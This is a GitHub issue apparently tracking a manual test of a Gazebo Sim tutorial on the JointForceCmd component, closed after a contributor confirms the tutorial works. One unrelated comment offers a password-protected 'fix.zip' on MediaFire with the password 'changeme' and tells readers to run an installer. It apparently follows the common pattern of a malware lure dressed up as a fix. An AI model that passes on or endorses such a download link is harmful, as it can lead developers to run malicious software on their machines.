gazebosim/gazebo_test_cases #1150: gz-sim: Case Study: Using the JointForceCmd Component

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/jointforcecmdcomponent.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/component_jointforcecmd.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peci1, 2024-09-16:
Small modernization: https://github.com/gazebosim/gz-sim/pull/2630 .

Otherwise, the tutorial works great.

closed 2024-09-16 by azeey